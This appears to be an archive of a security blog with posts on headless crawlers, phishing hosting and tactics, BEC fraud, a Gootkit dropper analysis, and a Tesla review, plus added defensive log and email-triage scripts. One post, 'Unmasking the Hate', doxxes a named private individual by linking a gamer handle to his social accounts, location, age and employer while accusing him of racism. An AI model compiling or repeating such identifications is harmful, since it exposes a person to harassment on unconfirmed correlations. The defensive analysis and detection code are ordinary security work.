One group of firewall logs recently caught my eye for a few reasons. The first reason was that, similar to my issue with OVH Hosting in a previous blog, there were numerous clients connecting simultaneously with the same user agent. At any given time, 3 to 5 of these hosts would be crawling information, like tags and posts, off of the site. Viewing the visitors live, I saw that a high percentage of the IPs below were all using the same user agent.

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/64.0.3282.119 Safari/537.36

Here’s a copy of the firewall log where I set up a rule to do an extended browser validation using JavaScript:

Does anybody know the purpose and source of these connections? Did you end up here by searching for one of the IPs? All of the subnets below belong to Amazon Technologies and could possibly be connected behind the scenes on Amazon Web Services.
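The pattern described above, several hosts crawling at once with one shared HeadlessChrome user agent, can be surfaced from ordinary access logs. The following is an added example, not code from the original post: it groups combined-format log lines by user agent and reports any user agent used by several distinct client IPs inside a short window. The sample log lines are constructed and use RFC 5737 documentation addresses rather than the Amazon IPs from the post.

```python
"""Added example (not from the original post): group access-log hits by user
agent and report user agents that several client IPs use at the same time."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The HeadlessChrome user agent quoted in the post, plus a normal desktop one.
HEADLESS_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) HeadlessChrome/64.0.3282.119 Safari/537.36")
DESKTOP_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36")
BOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def _line(ip, ts, path, ua):
    """Build one constructed line in Apache/nginx combined log format."""
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 5120 "-" "{ua}"'


# Constructed sample: four headless clients crawl tags and posts within about
# 30 seconds, then a regular visitor and a self-identifying crawler arrive.
SAMPLE_LOG = "\n".join([
    _line("203.0.113.10", "12/Jul/2018:14:01:03 +0000", "/tag/security/", HEADLESS_UA),
    _line("203.0.113.11", "12/Jul/2018:14:01:05 +0000", "/2018/07/bad-bots/", HEADLESS_UA),
    _line("203.0.113.12", "12/Jul/2018:14:01:09 +0000", "/tag/phishing/", HEADLESS_UA),
    _line("203.0.113.10", "12/Jul/2018:14:01:15 +0000", "/tag/malware/", HEADLESS_UA),
    _line("203.0.113.13", "12/Jul/2018:14:01:31 +0000", "/2018/06/panda-review/", HEADLESS_UA),
    _line("198.51.100.7", "12/Jul/2018:14:02:02 +0000", "/", DESKTOP_UA),
    _line("203.0.113.11", "12/Jul/2018:14:03:40 +0000", "/tag/adware/", HEADLESS_UA),
    _line("192.0.2.55", "12/Jul/2018:14:05:10 +0000", "/robots.txt", BOT_UA),
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"\s*$')
HEADLESS_MARKERS = ("HeadlessChrome", "PhantomJS")


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.group("req").split()
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": req[1] if len(req) > 1 else "",
        "ua": m.group("ua"),
    }


def is_headless(ua):
    """True when the user agent itself admits to being a headless browser."""
    return any(marker in ua for marker in HEADLESS_MARKERS)


def concurrent_clients(entries, window=timedelta(seconds=60), min_ips=3):
    """For each user agent, find the largest set of distinct client IPs that
    were active inside any `window`; report those with at least `min_ips`."""
    by_ua = defaultdict(list)
    for e in entries:
        by_ua[e["ua"]].append(e)
    findings = {}
    for ua, hits in by_ua.items():
        hits.sort(key=lambda e: e["ts"])
        best_ips = set()
        for i, start in enumerate(hits):
            active = {h["ip"] for h in hits[i:] if h["ts"] - start["ts"] <= window}
            if len(active) > len(best_ips):
                best_ips = active
        if len(best_ips) >= min_ips:
            findings[ua] = {
                "max_concurrent_ips": len(best_ips),
                "ips": sorted(best_ips),
                "requests": len(hits),
                "headless": is_headless(ua),
            }
    return findings


def analyze(log_text, **kwargs):
    """Parse raw log text and return the concurrent-client findings."""
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    return concurrent_clients(entries, **kwargs)


if __name__ == "__main__":
    for ua, info in analyze(SAMPLE_LOG).items():
        print(f'{info["max_concurrent_ips"]} IPs within 60s, headless={info["headless"]}: {ua}')
        print("   ", ", ".join(info["ips"]))
```

A user agent flagged this way is a candidate for the JavaScript validation rule mentioned above, whether or not it admits to being headless.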

100+ IP Addresses recorded in the month of July:

Phishing – A Master Anglers Toolbox

We recently came across a researcher’s gold mine of phishing sites. It all started with a PDF file received via an email called Post-Label. The file itself is harmless, but it links to the USPS scam shown below in the screenshots.


Further analysis of this IP found that it belongs to QuadraNet, a colocation provider that is only involved in hosting physical servers for its clients. The service is being provided to AlphaRacks, a VPS provider that rents out computing space by offering hosting to its clients.

VirusTotal has a ton of sites being hosted off this box, and almost an unbelievable amount of phishing pages and malware. We found more than 60 different brands being phished off this one IP address. The activity goes back to March 2018. It’s a phenomenon I call ‘hiding in plain sight,’ and that’s because vendors have been detecting the issue for many months, but no one has taken the initiative to file an abuse report.

We filed an abuse report and QuadraNet is now aware of the issue. They’ve committed to cutting off access from this IP if the client does not respond within a period of time and clean up the phishing sites. We’ve included numerous updates on the progress of the cleanup below, just before the screenshots we have collected over a period of months.

URLScan provides regular screenshots of the activity hosted on various domains at this IP address. I’ve seen hundreds and potentially thousands of domains pointing to this location over the last several months. reports 1,945 phishing URLs have been observed off of this address.

Brands being phished include CIBC Bank, DHL, GoDaddy, Microsoft Live, Office 365, OneDrive, Outlook Web Access, PayPal, USPS, 50+  others all on a single IP. This is a master angler at work, folks!

We’ve seen phishing attempts against the companies below. This is not a confirmation that they were compromised, only that they scanned a URL with an e-mail address inside of it, so we presume that the owner received it via an inbound phishing e-mail. Keep in mind this list only represents a small portion of the recipients and just a couple of days’ worth of URLs being scanned on VirusTotal:

Australia and New Zealand Bank
Aditya Birla Group
Conrad Hotels
Fox Broadcasting
Owens Corning
QBE Insurance Group
State of Minnesota
Tetra Pak
The Linde Group
VF Corporation

NOTE: Some of this research is incomplete and should be investigated further by other researchers. I tend to post these kinds of ‘live’ hacks quickly, to get the word out and let folks experiment a bit before the hackers are shut down. The first thing I did was notify the hosting provider, so the clock is ticking. Or maybe it’s not, depending on how well they handle abuse complaints.

E-mail possibly associated with activity: [email protected] 

Dozens of the sites have login pages for the Pony Botnet:


10/16 – We will allow the provider Quadranet to continue working with its client to remediate the issue.

9/17 – Activity continues and no response from ‘[email protected]‘ or Quadranet.

8/21 – Quadranet has reportedly taken action against AlphaRacks by null-routing its IP again due to the abuse. The IP was responding again a short time later.

8/14 – The IP still has dozens of phishing sites, malware binaries and botnet communication files hosted on it. I’ve been e-mailing this information to the upstream provider, which is QuadraNet. The co-location customer this IP belongs to either doesn’t have the time to keep an eye on this, or doesn’t know how to stop these phishermen. It’s also possible the server is compromised or that the operator AlphaRacks is complicit in the activity. I found that the blocks used to be owned by Crissic Solutions (Skylar MacMinn, Germany) who both worked at Quadranet and occupied the same IP space. An unknown entity was selling AlphaRacks on a web forum about 4 years ago at post#1 post#2.

8/7 – The IP continues to host phishing activity. We have reported additional sites to QuadraNet, who will presumably notify the colocation client again. Keep in mind we noticed this activity start trending upward in March of 2018. Obviously, they’ve been outsmarting both of these parties for a good deal of time, nearly half of 2018.

7/23 – QuadraNet has notified me that they are going to “null-route the IP address and reach out to our customer, they may not have been aware of the number of domains involved.” after they had repeatedly asked the customer to disable these services. The IP went down and was back up within a few hours. We confirmed it still had 5+ phishing sites live on it and reported that back to QuadraNet. We suspect the client is Alpharacks Hosting and that up to 1,200 domains may be on this server, most of them malicious.

Screenshots below:

I’ve reported this to Quadranet and PhishTank. Google Chrome warned against visiting many of these sites hosted on this IP.

Phishing – New Tactics and Techniques

We’ve recently observed a new trend with phishing and targeted malware attacks that use domains to bypass anti-spam. The attackers are using valid domains, SPF, SMTP, and reply addresses that mimic newsletter bouncebacks. These tactics allow the messages to bypass reputational and other types of checks.

The attachments are typical droppers, highly obfuscated and using Microsoft Word macros. Attachments were known under names such as Trojan-Downloader, VBA.Agent, and Exploit.Siggen leveraging Office CVE-2017-0199.

Domains w/ Virustotal link:

DocuSign –

Bank Of America –

Internal Revenue Service –

Dunn & Bradstreet –

Tactics and Techniques:

Attackers are using return addresses that resemble a real newsletter bounceback.

SPF records exist for the domain, and they match the servers that send the targeted emails. They are online, answering SMTP connections with the appropriate banner for the website.

Attackers are using VPS or full-service hosting accounts from providers like LeaseWeb and Secure Servers LLC to launch attacks. The devices have remote administration ports and services open.

Incoming emails are highly obfuscated by a randomly generated Word document with macros. Attackers will change the payload if a “virus” message is received. If it’s an RBL message, they will switch to another SMTP address and continue to hammer the system until it allows a delivery. Messages are modified in near real time after each rejection, until one is accepted.

Fighting Back:

If I had not configured a HOLD on documents with macros, these would have been delivered by my spam provider. I had an option configured to recognize “Newly Observed Domain,” but it didn’t recognize them, and it wasn’t set to block them. It may be a good idea to inspect these manually, or you could put in some kind of workflow for content examination to alert you when they are delivered. I’m looking for keywords like the ones below, and I’m also scanning some of the messages:

Account Locked
Hello Dear
Password Reset
Suspended Account
Unusual Sign-In


Domain #1


Domain record shows that it was registered today:

Here’s the SPF record for

The SMTP server at the host answers on behalf of this domain as well, for spam filters that connect back to the system during validation:

The sender passes SPF checks because they’re using a legitimate domain:

spf=pass (spfCheck: domain of designates as permitted sender) client-ip=; [email protected]y;
Content-Type: multipart/mixed;


Nmap results show smtp/25 is open, and proxy/8080 is listening. Neither is an open relay, so we assume the attacker configured them for quick remote access and spamming:


Email content was a word document:

Content-Disposition: attachment; filename="3873JDSB987391.doc"
Content-Transfer-Encoding: base64
Content-Type: application/msword; name="3873JDSB987391.doc"
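The “Fighting Back” workflow above (hold documents with macros, alert on lure keywords, treat a passing SPF check as no reassurance when the sender owns the domain) can be expressed as a small content-examination check. The following is an added example and not code from the original post: it parses a constructed message modelled on the headers shown for Domain #1, with placeholder domains and addresses, and returns a hold/alert/deliver verdict with the reasons.

```python
"""Added example (not from the original post): triage an inbound message the
way the "Fighting Back" section describes, holding Office attachments and
scoring lure keywords, with SPF treated as neutral."""
import email
from email import policy
from email.utils import parseaddr

# Keywords from the post's watch list, matched case-insensitively.
LURE_KEYWORDS = ("account locked", "hello dear", "password reset",
                 "suspended account", "unusual sign-in")
# Attachment types that go on HOLD for manual inspection.
HOLD_TYPES = {
    "application/msword",
    "application/vnd.ms-word.document.macroenabled.12",
    "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
}
HOLD_EXTENSIONS = (".doc", ".docm", ".dot", ".dotm", ".xls", ".xlsm")
# Magic bytes of an OLE compound file, the legacy binary .doc container.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
BOUNCE_LOCAL_PARTS = ("bounce", "noreply", "no-reply", "mailer-daemon")

# Constructed sample message. Domains, addresses and IPs are placeholders;
# the attachment name mirrors the header shown above, and its body is only
# the OLE magic followed by zero padding, not a real document.
SAMPLE_EMAIL = """\
Authentication-Results: mx.example.net; spf=pass (spfCheck: domain of bounce.example-newsletter.test designates 192.0.2.25 as permitted sender) client-ip=192.0.2.25; envelope-from=bounce+12345@bounce.example-newsletter.test;
From: "Bounce Notice" <bounce+12345@bounce.example-newsletter.test>
Reply-To: bounce+12345@bounce.example-newsletter.test
To: ap@victim.test
Subject: Unusual Sign-In Activity - Account Locked
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain; charset="utf-8"

Hello Dear, your account has been suspended. Open the attached document to restore access.

--XYZ
Content-Type: application/msword; name="3873JDSB987391.doc"
Content-Disposition: attachment; filename="3873JDSB987391.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--XYZ--
"""


def triage(raw_message):
    """Return {'verdict': hold|alert|deliver, 'keywords': [...], 'reasons': [...]}."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    reasons, hold = [], False
    body, attachments = "", []
    for part in msg.walk():
        if part.is_attachment() or part.get_filename():
            attachments.append(part)
        elif part.get_content_type() == "text/plain":
            body += part.get_content()

    text = (msg.get("Subject", "") + "\n" + body).lower()
    hits = [k for k in LURE_KEYWORDS if k in text]
    if hits:
        reasons.append("lure keywords: " + ", ".join(hits))

    for part in attachments:
        name = (part.get_filename() or "").lower()
        ctype = part.get_content_type()
        if ctype in HOLD_TYPES or name.endswith(HOLD_EXTENSIONS):
            hold = True
            reasons.append(f"office attachment {name} ({ctype})")
            data = part.get_payload(decode=True) or b""
            if data[:8] == OLE_MAGIC:
                reasons.append("OLE compound document (legacy binary format that can carry VBA macros)")

    _, addr = parseaddr(msg.get("From", ""))
    local_part = addr.split("@")[0].lower()
    if local_part.startswith(BOUNCE_LOCAL_PARTS) and attachments:
        reasons.append("bounce-style sender address carrying an attachment")

    if "spf=pass" in msg.get("Authentication-Results", ""):
        reasons.append("spf=pass is neutral here: the sender controls the domain")

    verdict = "hold" if hold else ("alert" if hits else "deliver")
    return {"verdict": verdict, "keywords": hits, "reasons": reasons}


if __name__ == "__main__":
    result = triage(SAMPLE_EMAIL)
    print(result["verdict"])
    for r in result["reasons"]:
        print(" -", r)
```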

Domain #2




Domain #3



Domain #4


Trolling – Hate and Video Games

“Do you feel the way you hate? (or) Do you hate the way you feel?” –Bush, Greedy Fly

I started thinking about this topic, and ultimately a blog, when a troll was repeatedly scrolling the “N” word on a video game I was playing last night. What’s more, this person felt comfortable doing it in front of 64+ other folks of unknown age, or ethnic backgrounds who were playing the game with us! I thought to myself, who are these trolls? What drives them? Do they have jobs or a family? I got the sense that hate goes deep into the psyche of the individual. If your attitude informs behavior, then typing that word over and over means that you are:

  1. Clearly racist, and
  2. Feeling untouchable because you are on the internet.

Just for kicks, I made a simple investigation into this person via public databases like Google and other websites. The most interesting thing was that the nickname he used seemed to be a real name, not a typical handle like “deathwarriorbot.” Well, that piqued my interest, and it didn’t take long to find out who may have allegedly been behind the hate – read on, and I’ll tell you what I found.

It’s official that the internet has become a cesspool of carbon copy trolls. There are many ways hate speech spreads online, and it seems to be getting worse. Twitter users line up to target people, and then anonymously rip them to shreds for fun and good times. It’s psychological warfare, and these seemingly anonymous trolls have flourished in an environment of little accountability. I know quite a bit about trolling, especially since I hacked from the early 90s until the mid-2000s; in fact, many of us trolls were hackers, information gatherers, and pranksters. We’d make phone calls to friends and other individuals, playing various jokes, some cruel, but nothing that could ruin a person’s life, and we never used hate speech to attack others. Sites like Twitter have given just about everyone a “voice” and can be highly politicized at times, littered with pure hate and negativity. Remember the old saying “Opinions are like a**holes, everybody has one”? Well, it’s true, and while I support free speech, I don’t condone speech that is hateful or intolerant. Honestly, I don’t like to read any comments nowadays, given the climate of trolls who are hate mongers.

It seems with the rapid growth of the internet, many of these people don’t care about being anonymous, as long as they can broadcast their message. There’s plenty of coverage on the psychology of why they do this, and on how the internet makes them feel powerful. I know this firsthand, as I’ve seen more than one Twitter or YouTube that has little to no followers or hits – but they carry on as if they’re on a podium of power, albeit a tiny one. Does that stop these people from thinking that somebody is listening? No. I don’t know what they call the disorder of having a disproportionate belief about your perceived power online versus offline, but I bet it’s hard to pronounce.

For example, in the political realm, a person’s beliefs seem to unconsciously be a part of his or her identity. If you attack a political figure, it is perceived as if you are attacking them directly at the core of what they believe. Attackers become stereotypical gang members who can take down any target at will. They preach division, not inclusion, and I think most of the time we have no idea who they really are. And because there’s proof that Russia and other countries have been behind many efforts to sway U.S. public opinion, it’s obvious that they do not reflect who we are as Americans – if they are from the U.S. at all.

To quote a favorite author of mine, Alan Weiss, from his Balancing Act blogs, “The human condition is not necessarily one of polarization. While tribes and cultures have been fighting for land and resources and power for millennia, they have also been able to come together for mutual benefit. The right to disagree, debate, and demur is important, even vital. But the belief that you’re with us or against us, you’re friend or enemy, is absurd. Despite the fact we may agree on a hundred other issues, this one issue creates an impregnable divide? Like the starship Enterprise, the emotional “shields” descend and prevent rational discourse and even logic from penetrating. You’re the “enemy,” so I have no intention of listening. Confirmation bias is viciously in play with highly emotional subjects: climate change, abortion, vivisection, politics, health care, welfare, education. That’s because passionate beliefs need to be shored up at all costs, and we’re reluctant to listen to evidence to the contrary with any objectivity at all. We need to stop searching solely for opinion and information that support our point of view (which is most of the activity on Facebook, by the way). As intelligent beings, we owe it to ourselves and our society to deliberately pursue varied points of view to draw our own rational conclusions.” I couldn’t have said it better, and I didn’t try.

So what can we do about trolls? Report them? Shame them publicly? Invite them to an MMA fight to ‘work things out’? I’d love that, but cowards typically won’t reveal themselves. It takes away their power when you can identify them, and for a troll, having the ‘docs’ on somebody is the ultimate weapon. It usually goes from politics to ad hominem (against the person), as you have to remember, this is about the ego defending one’s personal ‘identity.’ Nowadays, ignorant, intolerant college students shout at and shut down speakers with whom they disagree. What’s wrong with these students? Maybe we need accountability by lifting the mask of who’s behind the hate, and then it will be more apparent to trolls that their actions have consequences.

Now, on to the incident from last night… Note: there is explicit content in a racial slur, shown in a screenshot below.

Unmasking the Hate

Disclaimer: The information provided is as-is, and we do not condone the harassment of any individual, or hate speech. We are not stating it is a fact that this person conducted these activities, only sharing screenshots of a correlation between the name on this game, and what was found on Google. We are not ‘attacking’ this person, merely following a logical investigative path to uncover information. We are not accusing them of a crime, or wrongdoing. Do not attempt to call, e-mail, tweet, or harass this person based on this information. The purpose of providing this information is to offer a perspective into a situation that I directly witnessed, and impacted me personally. I’ve only compiled information from Google searches and added the perspective of any typical internet user.

*** Update 11/7/2018 – Ran into Nathan again on his foul racist tear in the game Battlefield.



Screenshot of a user ‘NthnKirsch2’ writing vulgarities over and over, an estimated 100 times throughout the game in Battlefield 4, shown below:


Wait, there’s a twitter @nthnkirsch2, what are the odds? Probably just a coincidence, I mean we can’t confirm this guy is the same person, right?


Support for politics correlates with another comment on Steve Bannon


Hmm, the account for his game below seems to have the same picture. But hey, maybe it’s just another coincidence. Oh wait, it could be that a family member uses the account. Maybe a bad little brother, I mean that would explain it, right?


It looks like somebody using Nathan’s account petitioned to have a ban removed, for guess what? None other than racial slurs. This happened back in 2014, so either his “little brother” (Nathan was 34 at the time) is back with a vengeance, trying to throw dirt on his name, or it’s a cover-up.


In the blog posting, there’s a reference linking the alias nthnkirsch1, a member of Steam that says the user is from North Carolina. This is important because in the LinkedIn below the primary education of the user is Duke University, located in North Carolina. There is another Nathan I found in NC, and he’s still in college, not a 38-year-old male like what is shown above.


Instagram account forms another nexus between nthnkirsch1 and nthnkirsch2.


It seems like this hateful user shares a bit of ‘gaming rage’ with his little brother (if he actually exists). Earlier this year he was complaining about hacks, cheaters, and issues using the game. This is similar to the comments in the game of ‘nice hack’ and seems to fit pretty well with the first image:


Found a comment here with hate speech by user Nthnkirsch2:


Here’s a Facebook, which we assume is the same Nathan. He’s living in PA, and self-employed.


A quick search on LinkedIn finds one Nathan Kirsch, from PA. Unless there are two Nathan Kirsches in the same town in PA? He appears well educated, from Duke (North Carolina), for a person spewing this kind of racism (little brother?), and is currently the CEO at Radon Be Gone, primarily serving people in Colorado, Idaho, Montana, Nevada, and Wyoming.


Confirmed by other information available on the internet, simply by searching the name we found in the game, nothing more. If Nathan is the one perpetrating this hate, then he hasn’t done much to cover up his tracks.

Any comments from Nathan Kirsch or Radon Be Gone? I’d be happy to discuss, and post your thoughts on the issue. Please advise, as I’d like for myself (and my little family members) to play a game without being exposed to hate speech. Nathan, if this was you, I hope it’s a lesson that not only should you be more careful about using your real name, but you should also have a bit of compassion for people of color. Something hateful is inside of you, and it seems to have been festering for a while. Why do you attack other people? What makes you so angry? If it was Nathan’s little brother, he’s been at this for years now based on what we found online. I think it might be time for him to create his own accounts, and stop using the good name of his big brother.

I’m wondering whether people like this can change – or become better by accepting a love for diversity? It’s hard to say, but I felt like using my voice here could shine a light on this issue, and show you that not all trolls are immature 12-year-old gamers who are not worth looking into. Some of these trolls and hate speech advocates appear to be well-educated CEOs, and they seem to have nothing better to do than spread hate – a clearly unsustainable way to live in the melting pot we call America.

Trolls just want to have fun, and unfortunately for them, that correlates strongly with sadism, psychopathy, and Machiavellianism. 


Tesla – Model 3 Test Drive and Winning Big

In recent news, people who wouldn’t ordinarily care about cars are obsessing about the numbers of Tesla, a billion dollar corporation. They’re laying down strategies and pleading on Twitter with Elon Musk to see things another way. But will he? Should he?

Let me ask you something – when was the last time you spent more than your salary on a bet, like starting a business or perhaps an investment, where you directly contributed to the end goal? I think the vast majority of people would say that they have never done it and that they don’t know the first thing about managing themselves, never mind operating a company with 30k employees. Not only is it almost inconceivable from that perspective, it’s impossible to fully comprehend.

That’s why people with no money or experience in the auto industry can have a voice going play-by-play with Tesla on the internet. The news is promoting negative outlooks, and I think the advice is formulated for investors – not the long-term successes but the short-term payouts. All you have to do is read the news to drown in the numbers on last week’s growth. But who’s controlling the narrative, the investors? How about propaganda from the competition? Renowned Twitter experts can see that 3,750 + 1,250 (25% more) = 5,000, which is their calculated proof of the company’s future outlook. It’s simple, right? Let me try to break this down, at least from the tiny window we all look through while trying to figure out what’s going on inside of Tesla. Mind you, I’ve done little research, but I keep up with the barebones facts and Tesla’s statements, in general.

Tesla’s Fremont manufacturing plant was aiming to produce 2,500 cars per day. This was less than 90 days ago and under a different leadership. It looks to me like Elon is doing what most leaders can’t and won’t do – he’s getting out of the office chair and down on the production floor to see his goals come to fruition. It’s exciting and awe-inspiring. I’d be honored to work there right alongside him in that battle.

The problem with these news reports is that they’re from the perspective of contributors who are hung up on their own concerns (When can I leave?? 5 pm? Ugh!), and have limited visibility into the big picture. I’m sure the guy in the paint shop knows a ton about what’s going on, and I trust his casual observations from the floor without any question or hesitation. Wait, isn’t he supposed to be busy painting? The Fremont location alone has increased by 4,000 employees since June of 2016. Most of the haters Tesla talks about are either:

  1. Betting on the losses,
  2. Working with the competition, or
  3. Not qualified or informed enough to make an assessment.

Or maybe I’m just optimistic. I know what it’s like to work hard when everybody around you is doubtful, cynical, and spreading the worst outlook possible.

The Model 3 isn’t a myth. It’s a reality, and I know so because I drove a privately owned one recently for 3-4 days (VIN #9257). I’ve owned a variety of vehicles including Infiniti, Chrysler, Pontiac, Lincoln, Ford, and several others. In the last few years, I’ve rented at least 100 cars including Audi, BMW, Fiat, Mercedes, Lexus, Cadillac, Volkswagen, Subaru, Dodge, and the list goes on. Generally, the vehicles would have cost anywhere from $30k-$70k. I used these during my travels and would casually leverage a significant discount (50%) that I have with one company that’s local to my area. I’m not an expert on cars, but I have driven many of them, especially recently, so I know how frustrating all the quirks can be every time I change models and drive a different car around for two-and-a-half years. I’ve been frustrated by the unknown and puzzled by features, even where to pop the gas tank. How about Bluetooth issues? Ever reboot your phone or pair it five times to hear just five minutes of music? I’ve had dead batteries, overheating engines, and cars from hell that wouldn’t drive straight. And the majority of them were new cars with 0-20k miles!

The Model 3 was smooth on user experience, had tons of torque, and generally was fun to drive, unlike many other small, cramped, uncomfortable cars. I took several trips from Providence to Boston and back, only needing to recharge one time, and I started the trips with 20% battery. The technology was great and offered one of the most intuitive NAV experiences I’ve had to date. The car was just online, not tethering or using my phone as a hotspot. Tesla knows that small things make a difference, and the way the OS was set up is very intuitive. Overall, this car is reliable, and I’d be happy to own it after some time passes with the first generations. I think the key is just jumping in one and driving it on your terms. I highly recommend doing that, and then, only then, should you render an opinion. You could read about them for days and look at every picture of them on the internet. Just get in one and get going. They rock!

Whether you bet for or against Tesla, they are still a winner. The company is about disruption and pushing the limits, done in the spirit of being up against impossible odds. The story is just as exciting to me without having to know or consider thinking about how it will end.

Also see: The War on Tesla, Musk, and the Fight for the Future



  • Long Range Battery (310 mi / 500 km)
  • Premium Upgrades (full glass roof, heated seats, etc.)
  • 0-60 mph in 5.1 seconds
  • Enhanced Autopilot features: Lane Change, Autosteer, Side Collision Warning, Summon (coming soon), Automatic Parking, Emergency Braking



New Blog Design – Coming in July

Finishing up the final code for my 2018 redesign. My desk is getting a facelift, and there will be a fully responsive mobile site. I’ve been patching all the leaks and covering up code issues with various plug-ins, CDNs, and enhancements for far too long. I need to focus on device compatibility, and most importantly the readability of the blog. Fonts, colors, the background should be adjusted to be easier on the eyes. I hope you enjoy it, and I’ll work to take more time to write useful content. I’m also working with an editor to proofread and organize my content better.

Note: I’ve actually got a bamboo top Jarvis Sit-Stand, Back App Chair, Dual Monitor Arm, 2x Dell S2318H, Contour Unimouse, RollerMouse Red, Logitech Z623, Google Pixel 2, Dell XPS 8390, Dell Latitude E5480, VSL188NC desk lamp, and 2 layers of 4x cheapo interlocking floor squares.

Thanks for reading, and stay safe.


Operation WireWire – ACH Fraud Takedown

“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland. The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.” (

Business Email Compromise (BEC) is one of the scams aimed at companies that conduct wire transfers and have suppliers abroad.  Corporate or publicly available email accounts of executives and high-level employees related to finance or involved with wire transfer payments are either spoofed or compromised, through keyloggers or phishing attacks, to make fraudulent transfers, resulting in hundreds of thousands of dollars in losses. (Trend Micro).

I’ve seen recent comments in the media about how this DOJ crackdown wouldn’t put a big dent in or even make much of an impact on BEC, given the breadth of fraud associated with this outfit. I’d imagine the analysts in these quotes are looking at aggregate totals from the mile-high perspective and not the close-up, full scale of the damage to small businesses in our country. Companies have gone out of business, and schools have been attacked by these perpetrators. Personally, I don’t agree with or support the position that it’s just another routine arrest and it should be glazed over like it was picking off a few credit card skimmers.

The economies of scale with traditional Credit Card Fraud vs. Business E-mail Compromise cannot be directly compared, given who they impact and the average losses. This issue has never been about mitigating an impact on consumers as the criminals have always been focused on attacking small to medium-sized businesses. Typically, it’s the commercial accounts that are vulnerable to this kind of wire transfer fraud, unlike consumer credit cards that have built-in fraud protection that uses randomly generated numbers and a Visa or MasterCard logo. In these cases, the wires are facilitated directly from the account number being compromised.

Criminals obviously have a lot more to gain from raiding the digital coffers of businesses that handle millions in revenue, given that the average consumer credit card limit hovers around a measly $8,000. The average per-incident loss for a successful BEC scam is around $130,000; in comparison, robbing a bank will rake in about $3,800. The losses for traditional credit card fraud reported per incidence are much lower. Take a look at “23 Frightening Credit Card Fraud Statistics,” and you’ll see that in 2014, the median loss was $300 and the average reported loss was $1,343. If you’d ask someone who was ‘crushed’ by these low numbers to compare them to high-volume fraud numbers, you’d see how it wouldn’t make a dent. The reality, however, is that many BEC scams can net over a million dollars from a single source, something that seems unfathomable to people who are still living in the world of old-fashioned credit card fraud. This isn’t like the time somebody bought a $100 pair of sneakers using my debit card.

Not sure if this is a problem yet? Just ask Google and Facebook, who were the victims of a 100 million dollar fraud perpetrated almost entirely by a single individual in Lithuania. There are Nigerian men who stole almost 4 million dollars in a short time. If you really want to know, ask Leoni AG, a company that lost 44 million dollars in a single scam just a few years back. Are these extreme examples of BEC? No, many of these scams exceed a million dollars in losses in just a single incident. I don’t need to know the exact figures to make the connection that attackers with minimal sophistication are pulling it off for piles of cash. BEC scammers were operating mostly with impunity before this crackdown effort by the DOJ. If not, how could the losses possibly add up to 3 billion dollars? DOJ has been able to lock up a few here and there, but nothing like the 71 people from this most recent sweep.

Any law enforcement action would be welcomed, as long as it protects companies from scams and sends this clear message to the criminals abroad: If your activity trends upwards, so will our efforts to capture you. Not to mention that the hands of justice are now orienting themselves on how to efficiently take down these networks, thereby opening the door for streamlined enforcement for this type of crime.

The DOJ is doing a good job, and I don’t see it as a “dog and pony show” to expose these scammers in front of the world. It’s about justice and showing people in other countries that the internet may seem like a free plane ticket to communicate overseas, but you can still get arrested where that connection lands, just like you could in an airport. You’ve got to get started sometime, and today works well for tomorrow’s potential victims.

I think people who work on the ground in Cyber Security know that this day is long overdue, and it’s to be celebrated, not shrugged off as a waste of time. I’d never call it a waste of time – who in my industry would?

So let’s not turn the war on BEC into the war on Credit Card Fraud. Great work out there, folks!

Recent News:

Washington Post – It’s time to stop laughing at Nigerian scammers — because they’re stealing billions of dollars

Boston Herald – Phishing theft of $93G at clean energy agency went unreported for months

Telstra – A silent cybercrime blitzkrieg as Aussie businesses robbed of millions

IC3 – 2017 Internet Crime Report featuring Business E-mail Compromise

SWIFT E-mail Leads To Evasive Gootkit


We follow the trail of another spam e-mail. It’s delivering a malware downloader that’s 0/63 on Virustotal, not unheard of these days. The e-mail had a PDF attachment SWIFT-MT103.pdf which itself was innocuous and simply displayed a fuzzy scan image, purportedly a SWIFT request that linked to a file hosted on

Tactics of the downloader/dropper:

Contains functionality for read data from the clipboard
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Detected TCP or UDP traffic on non-standard ports
Sample file is different than original file name gathered from version info
Internet Provider seen in connection with other malware
Icon mismatch, PE includes an icon from a different legit application
Reads the hosts file

…and many other warning signs surfaced by the sandbox during deeper debugging are included in the report.

Received: from (
(envelope-from <[email protected]>)

Reply-To: <[email protected]>
Date: Tue, 12 Jun 2018 01:42:52 +0000

A copy of the original e-mail received by a honeypot spam account:

Download the attached PDF, and examine it to find a link:

SWIFT MT103 PDF from E-mail 


Download the file from the link, and unzip the contents:


Analysis on the dropper downloaded from this link:

SWIFT MT103 Joe Sandbox Report

or directly from Joe Sandbox if you don’t trust my PDF.




Suppoie Crypto Hijack

